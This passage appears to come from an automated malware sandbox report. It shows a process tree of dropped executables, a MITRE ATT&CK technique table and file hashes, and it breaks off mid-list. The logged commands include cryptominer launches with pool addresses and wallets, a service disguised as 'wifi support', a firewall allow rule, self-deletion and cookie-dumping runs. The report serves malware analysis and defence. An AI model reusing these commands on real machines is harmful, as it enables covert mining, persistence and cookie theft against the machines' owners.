                                                                                                            C:\Users\Admin\AppData\Local\Temp\t0ua4yvb.a5j\inst.exe
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4608
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i1enpn2z.hra\c7ae36fa.exe & exit
                                                                                                          6⤵
                                                                                                            PID:4740
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\i1enpn2z.hra\c7ae36fa.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\i1enpn2z.hra\c7ae36fa.exe
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:5036
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Modifies system certificate store
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4336
                                                                                                    • C:\Users\Admin\AppData\Roaming\D8C2.tmp.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\D8C2.tmp.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:4800
                                                                                                      • C:\Users\Admin\AppData\Roaming\D8C2.tmp.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\D8C2.tmp.exe"
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks processor information in registry
                                                                                                        PID:5292
                                                                                                    • C:\Users\Admin\AppData\Roaming\DC3D.tmp.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\DC3D.tmp.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Adds Run key to start application
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:4876
                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w16721@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                        4⤵
                                                                                                          PID:4528
                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w29347 --cpu-max-threads-hint 50 -r 9999
                                                                                                          4⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          PID:5220
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                        3⤵
                                                                                                          PID:5200
                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                            ping 127.0.0.1
                                                                                                            4⤵
                                                                                                            • Runs ping.exe
                                                                                                            PID:4212
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks whether UAC is enabled
                                                                                                        PID:5684
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Adds Run key to start application
                                                                                                        PID:5024
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4948
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4352
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4460
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4192
                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                      1⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:676
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                        2⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Checks processor information in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:1552
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                      1⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:5772
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -u -p 5772 -s 3436
                                                                                                        2⤵
                                                                                                        • Program crash
                                                                                                        PID:5844
                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      PID:416
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4852
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:5388
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                        PID:4620
                                                                                                      • C:\Windows\system32\werfault.exe
                                                                                                        werfault.exe /h /shared Global\e2933c72981a465daa985ed5b313e0c8 /t 6104 /p 5388
                                                                                                        1⤵
                                                                                                          PID:6124
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5938.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\5938.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:5116
                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                            2⤵
                                                                                                              PID:1152
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6416.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\6416.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2096
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6C74.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\6C74.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5204
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\75DB.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\75DB.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:5408
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\75DB.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\75DB.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3888
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7D7D.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\7D7D.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            PID:4756
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\82BE.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\82BE.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4748
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xmwrwvkr\
                                                                                                              2⤵
                                                                                                                PID:5640
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  3⤵
                                                                                                                    PID:4064
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yummjyxl.exe" C:\Windows\SysWOW64\xmwrwvkr\
                                                                                                                  2⤵
                                                                                                                    PID:4376
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    "C:\Windows\System32\sc.exe" create xmwrwvkr binPath= "C:\Windows\SysWOW64\xmwrwvkr\yummjyxl.exe /d\"C:\Users\Admin\AppData\Local\Temp\82BE.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                    2⤵
                                                                                                                      PID:5912
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      "C:\Windows\System32\sc.exe" description xmwrwvkr "wifi internet conection"
                                                                                                                      2⤵
                                                                                                                        PID:4936
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        "C:\Windows\System32\sc.exe" start xmwrwvkr
                                                                                                                        2⤵
                                                                                                                          PID:5520
                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                          2⤵
                                                                                                                            PID:4200
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8966.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\8966.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4000
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                            2⤵
                                                                                                                              PID:5912
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                              2⤵
                                                                                                                                PID:5448
                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                2⤵
                                                                                                                                  PID:3252
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                  2⤵
                                                                                                                                    PID:5416
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:3104
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\959C.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\959C.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Enumerates system info in registry
                                                                                                                                    PID:5844
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:2104
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:5136
                                                                                                                                    • C:\Windows\SysWOW64\xmwrwvkr\yummjyxl.exe
                                                                                                                                      C:\Windows\SysWOW64\xmwrwvkr\yummjyxl.exe /d"C:\Users\Admin\AppData\Local\Temp\82BE.exe"
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:5076
                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                        svchost.exe
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:5828
                                                                                                                                        • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                          svchost.exe -o masari.miner.rocks:30162 -u 9rqX2BQ6Z4teAkaSqGBWvPZEM7bAtidewXXjYz86pVgKUQqDHeUqjy55fXt2fJAaJkPBteXWhptFqJVSr132QxsSSGfMCgw.50000 -p w=a -k -a cn/half
                                                                                                                                          3⤵
                                                                                                                                            PID:5960
                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5812
                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                          PID:5096
                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:4528
                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                            PID:5328
                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:5972
                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                              1⤵
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              PID:5752
                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:4980
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                1⤵
                                                                                                                                                  PID:5732
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4524
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                    1⤵
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:3592
                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                    PID:5624
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:4684
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:6136
                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 6136 -s 1604
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:5532
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                    PID:5712
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:912
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:2744
                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 2744 -s 1808
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4728
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:1736
                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 1736 -s 1780
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:2656

                                                                                                                                                  Network

                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                  Persistence

                                                                                                                                                  New Service

                                                                                                                                                  1
                                                                                                                                                  T1050

                                                                                                                                                  Modify Existing Service

                                                                                                                                                  1
                                                                                                                                                  T1031

                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                  2
                                                                                                                                                  T1060

                                                                                                                                                  BITS Jobs

                                                                                                                                                  1
                                                                                                                                                  T1197

                                                                                                                                                  Privilege Escalation

                                                                                                                                                  New Service

                                                                                                                                                  1
                                                                                                                                                  T1050

                                                                                                                                                  Defense Evasion

                                                                                                                                                  Disabling Security Tools

                                                                                                                                                  1
                                                                                                                                                  T1089

                                                                                                                                                  Modify Registry

                                                                                                                                                  5
                                                                                                                                                  T1112

                                                                                                                                                  BITS Jobs

                                                                                                                                                  1
                                                                                                                                                  T1197

                                                                                                                                                  Install Root Certificate

                                                                                                                                                  1
                                                                                                                                                  T1130

                                                                                                                                                  Credential Access

                                                                                                                                                  Credentials in Files

                                                                                                                                                  4
                                                                                                                                                  T1081

                                                                                                                                                  Discovery

                                                                                                                                                  Software Discovery

                                                                                                                                                  1
                                                                                                                                                  T1518

                                                                                                                                                  Query Registry

                                                                                                                                                  5
                                                                                                                                                  T1012

                                                                                                                                                  System Information Discovery

                                                                                                                                                  6
                                                                                                                                                  T1082

                                                                                                                                                  Security Software Discovery

                                                                                                                                                  1
                                                                                                                                                  T1063

                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                  1
                                                                                                                                                  T1120

                                                                                                                                                  Remote System Discovery

                                                                                                                                                  1
                                                                                                                                                  T1018

                                                                                                                                                  Collection

                                                                                                                                                  Data from Local System

                                                                                                                                                  4
                                                                                                                                                  T1005

                                                                                                                                                  Command and Control

                                                                                                                                                  Web Service

                                                                                                                                                  1
                                                                                                                                                  T1102

                                                                                                                                                  Replay Monitor

                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                  Downloads

                                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                    MD5

                                                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                    SHA1

                                                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                    SHA256

                                                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                    SHA512

                                                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                    MD5

                                                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                    SHA1

                                                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                    SHA256

                                                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                    SHA512

                                                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                  • C:\Program Files\Windows Defender\LXTUZZHXHE\ultramediaburner.exe
                                                                                                                                                    MD5

                                                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                    SHA1

                                                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                    SHA256

                                                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                    SHA512

                                                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                  • C:\Program Files\Windows Defender\LXTUZZHXHE\ultramediaburner.exe
                                                                                                                                                    MD5

                                                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                    SHA1

                                                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                    SHA256

                                                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                    SHA512

                                                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                  • C:\Program Files\install.dat
                                                                                                                                                    MD5

                                                                                                                                                    806c3221a013fec9530762750556c332

                                                                                                                                                    SHA1

                                                                                                                                                    36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                                    SHA256

                                                                                                                                                    9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                                    SHA512

                                                                                                                                                    56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                                  • C:\Program Files\install.dat
                                                                                                                                                    MD5

                                                                                                                                                    31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                                                    SHA1

                                                                                                                                                    c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                                                    SHA256

                                                                                                                                                    b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                                                    SHA512

                                                                                                                                                    3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                                                  • C:\Program Files\install.dll
                                                                                                                                                    MD5

                                                                                                                                                    fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                    SHA1

                                                                                                                                                    6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                    SHA256

                                                                                                                                                    9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                    SHA512

                                                                                                                                                    0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                  • C:\Program Files\install.dll
                                                                                                                                                    MD5

                                                                                                                                                    fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                    SHA1

                                                                                                                                                    6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                    SHA256

                                                                                                                                                    9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                    SHA512

                                                                                                                                                    0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                  • C:\Program Files\libEGL.dll
                                                                                                                                                    MD5

                                                                                                                                                    cc0f81a657d6887e246f49151e60123d

                                                                                                                                                    SHA1

                                                                                                                                                    1eb31528501c375817853e09d95b7152858c5b31

                                                                                                                                                    SHA256

                                                                                                                                                    31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                                                                    SHA512

                                                                                                                                                    8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                                                                  • C:\ProgramData\1329923.exe
                                                                                                                                                    MD5

                                                                                                                                                    6c275e3ad15bd4b6852dea757dff4dd1

                                                                                                                                                    SHA1

                                                                                                                                                    673f52a43085a8fdc93fffe24f85213bb2ce1993

                                                                                                                                                    SHA256

                                                                                                                                                    79e17f3dd9608d4897768138ce765aa3fbc253e65dd0b1031ea821cb68f3c1db

                                                                                                                                                    SHA512

                                                                                                                                                    a8d2f693ccbba557d1e8b5cef567f49b63bd1bdcf867b624ae7417875dda07f177d3392010e39dd7ab9fb778fb0b6fe30359fb005a5305610c685949ca5a5f7b

                                                                                                                                                  • C:\ProgramData\1329923.exe
                                                                                                                                                    MD5

                                                                                                                                                    6c275e3ad15bd4b6852dea757dff4dd1

                                                                                                                                                    SHA1

                                                                                                                                                    673f52a43085a8fdc93fffe24f85213bb2ce1993

                                                                                                                                                    SHA256

